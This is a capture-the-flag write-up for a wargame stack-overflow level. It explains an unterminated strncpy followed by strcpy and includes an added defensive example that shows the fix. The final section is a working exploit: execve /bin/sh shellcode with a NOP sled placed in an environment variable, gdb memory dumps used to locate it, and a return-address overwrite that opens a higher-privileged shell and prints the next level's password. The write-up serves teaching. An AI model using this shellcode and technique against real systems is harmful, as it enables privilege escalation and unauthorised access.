The source of the Level 6 challenge is as follows.
#include<string.h>
// The devil is in the details - nnp
void copy_buffers(char *argv[])
{
char buf1[32], buf2[32], buf3[32];
strncpy(buf2, argv[1], 31);
strncpy(buf3, argv[2], sizeof(buf3));
strcpy(buf1, buf3);
}
int main(int argc, char *argv[])
{
copy_buffers(argv);
return 0;
}
There is no spot where an overflow obviously happens. Yet with the input below the program crashes with a segmentation fault.
level6@io:/tmp/by6$ /levels/level06 `python -c "print 'A'*10 + ' ' + 'B'*31"`
level6@io:/tmp/by6$ /levels/level06 `python -c "print 'A'*10 + ' ' + 'B'*32"`
Segmentation fault
level6@io:/tmp/by6$
To see how the overflow actually comes about, let's modify the code as below (adding a printf after each copy) and check.
#include <stdio.h>
#include <string.h>
// The devil is in the details - nnp
void copy_buffers(char *argv[])
{
    char buf1[32], buf2[32], buf3[32];
    strncpy(buf2, argv[1], 31);             // at most 31 bytes, so buf2 always keeps a terminator
    printf("%s\n", buf2);
    strncpy(buf3, argv[2], sizeof(buf3));   // 32 bytes: no NUL is written when argv[2] is 32 chars or longer
    printf("%s\n", buf3);                   // an unterminated buf3 prints on into whatever follows it
    strcpy(buf1, buf3);                     // and the copy runs on in the same way, past the end of buf1
    printf("%s\n", buf1);
}
int main(int argc, char *argv[])
{
    copy_buffers(argv);
    return 0;
}
level6@io:/tmp/by6$ ./a.out `python -c "print 'A'*10 + ' ' + 'B'*31"`
AAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
level6@io:/tmp/by6$ ./a.out `python -c "print 'A'*10 + ' ' + 'B'*32"`
AAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAA
Segmentation fault
level6@io:/tmp/by6$
We can see that when buf3 is filled with exactly 32 bytes it is left without a terminator, so the following strcpy keeps reading into the adjacent buf2 and copies its contents along, overflowing buf1.
So it looks like we can place the address we want in buf2 and then overflow buf3. Let's try the attack.
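To make the mechanism concrete from the defender's side, here is an added C example (it is not part of the original post or of the IO challenge code). It reproduces the strncpy pitfall in a deterministic way and shows the fix. The struct `frame`, the functions `vulnerable_copy_len`, `bounded_copy`, `fixed_copy_len` and `demo_copy_len`, and the constructed inputs (ten 'A's, N 'B's) are all assumptions of this example; the struct only stands in for the stack layout the post observed, where buf2 follows buf3.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the copy_buffers() frame: two adjacent char
 * arrays have no padding between them, so an unterminated buf3 runs
 * straight into buf2, just as it did on the level's stack. */
struct frame {
    char buf3[32];
    char buf2[32];
};

/* Length of s, never reading more than max bytes (portable strnlen). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* The pattern from the level: strncpy with n == sizeof(dst). If the source
 * has n or more bytes, strncpy writes no NUL, so the later strcpy out of
 * buf3 copies buf3 *and* buf2. Returns how many bytes that strcpy would
 * copy, bounded by the frame size so the demo itself stays in bounds. */
size_t vulnerable_copy_len(const char *arg1, const char *arg2)
{
    struct frame f;
    memset(&f, 0, sizeof f);                 /* zeroed so the demo is deterministic */
    strncpy(f.buf2, arg1, 31);               /* 31 max: buf2 keeps its terminator */
    strncpy(f.buf3, arg2, sizeof f.buf3);    /* 32: no terminator if arg2 >= 32 chars */
    return bounded_len(f.buf3, sizeof f);    /* what strcpy(buf1, buf3) would copy */
}

/* Hardened copy: reserves one byte for the terminator and writes it
 * explicitly, so dst is a valid C string whatever the input length.
 * Returns the number of characters stored (excluding the NUL). */
size_t bounded_copy(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return 0;
    size_t n = bounded_len(src, dst_size - 1);   /* never read past what fits */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}

/* Same frame, same inputs, copies done with bounded_copy instead. */
size_t fixed_copy_len(const char *arg1, const char *arg2)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    bounded_copy(f.buf2, sizeof f.buf2, arg1);
    bounded_copy(f.buf3, sizeof f.buf3, arg2);
    return bounded_len(f.buf3, sizeof f);    /* now never exceeds 31 */
}

/* Builds argv[1] = ten 'A's and argv[2] = blen 'B's (constructed inputs
 * mirroring the commands in the post) and reports the copied length. */
size_t demo_copy_len(int use_fix, size_t blen)
{
    const char *a = "AAAAAAAAAA";
    char b[64];
    if (blen >= sizeof b)
        blen = sizeof b - 1;
    memset(b, 'B', blen);
    b[blen] = '\0';
    return use_fix ? fixed_copy_len(a, b) : vulnerable_copy_len(a, b);
}

int main(void)
{
    printf("vulnerable, 31 B: %zu bytes copied\n", demo_copy_len(0, 31)); /* 31 */
    printf("vulnerable, 32 B: %zu bytes copied\n", demo_copy_len(0, 32)); /* 42: buf2 tags along */
    printf("fixed,      32 B: %zu bytes copied\n", demo_copy_len(1, 32)); /* 31 */
    return 0;
}
```

The 42 for the 32-byte case is the 32 'B's plus the ten 'A's sitting in buf2, which is exactly what the post's printf output showed; into a 32-byte buf1 that is an 11-byte overflow (including the terminator). The fix is not to avoid strncpy but to treat its result as a byte array rather than a string: always copy at most size-1 bytes and terminate explicitly, and never pass an strncpy'd buffer to strcpy, strlen or printf("%s") without that guarantee.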
level6@io:/tmp/by6$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level6@io:/tmp/by6$ gdb /levels/level06
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) b main
Breakpoint 1 at 0x80483fa
(gdb) r
Starting program: /levels/level06
Breakpoint 1, 0x080483fa in main ()
(gdb) x/32wx $esp
0xbfffdca4: 0xbfffdcc0 0xbfffdd18 0x0094f455 0x08048470
0xbfffdcb4: 0x080482f0 0xbfffdd18 0x0094f455 0x00000001
0xbfffdcc4: 0xbfffdd44 0xbfffdd4c 0x0052db18 0x00000001
0xbfffdcd4: 0x00000001 0x00000000 0x0804820c 0x00a72ff4
0xbfffdce4: 0x08048470 0x080482f0 0xbfffdd18 0xebb98081
0xbfffdcf4: 0x3de835ff 0x00000000 0x00000000 0x00000000
0xbfffdd04: 0x0069f2e0 0x0094f37d 0x006a6ff4 0x00000001
0xbfffdd14: 0x080482f0 0x00000000 0x08048311 0x080483ec
(gdb)
0xbfffdd24: 0x00000001 0xbfffdd44 0x08048470 0x08048420
0xbfffdd34: 0x0069a250 0xbfffdd3c 0x006a4ae5 0x00000001
0xbfffdd44: 0xbfffde22 0x00000000 0xbfffde32 0xbfffdebf
0xbfffdd54: 0xbfffdecf 0xbfffdeda 0xbfffdefc 0xbfffdf10
0xbfffdd64: 0xbfffdf1c 0xbfffdf28 0xbfffdf55 0xbfffdf6b
0xbfffdd74: 0xbfffdf7a 0xbfffdf87 0xbfffdf90 0xbfffdfa2
0xbfffdd84: 0xbfffdfaa 0xbfffdfb9 0x00000000 0x00000010
0xbfffdd94: 0xbfebfbff 0x00000006 0x00001000 0x00000011
(gdb)
0xbfffdda4: 0x00000064 0x00000003 0x08048034 0x00000004
0xbfffddb4: 0x00000020 0x00000005 0x00000007 0x00000007
0xbfffddc4: 0x0068c000 0x00000008 0x00000000 0x00000009
0xbfffddd4: 0x080482f0 0x0000000b 0x000003ee 0x0000000c
0xbfffdde4: 0x000003ee 0x0000000d 0x000003ee 0x0000000e
0xbfffddf4: 0x000003ee 0x00000017 0x00000000 0x0000000f
0xbfffde04: 0xbfffde1b 0x00000000 0x00000000 0x00000000
0xbfffde14: 0x00000000 0x69000000 0x00363836 0x6c2f0000
(gdb)
0xbfffde24: 0x6c657665 0x656c2f73 0x306c6576 0x48530036
0xbfffde34: 0x434c4c45 0x3d45444f 0x90909090 0x90909090
0xbfffde44: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde54: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde64: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde74: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde84: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde94: 0x90909090 0x90909090 0x90909090 0x3158176a
(gdb) q
The program is running. Exit anyway? (y or n) y
level6@io:/tmp/by6$ /levels/level06 `python -c "print '\x94\xde\xff\xbf'*2 + ' ' + 'B'*32"`
sh-3.2$ id
uid=1006(level6) gid=1006(level6) euid=1007(level7) groups=1006(level6),1029(nosu)
sh-3.2$ cat /home/level7/.pass
qpapbi2w
sh-3.2$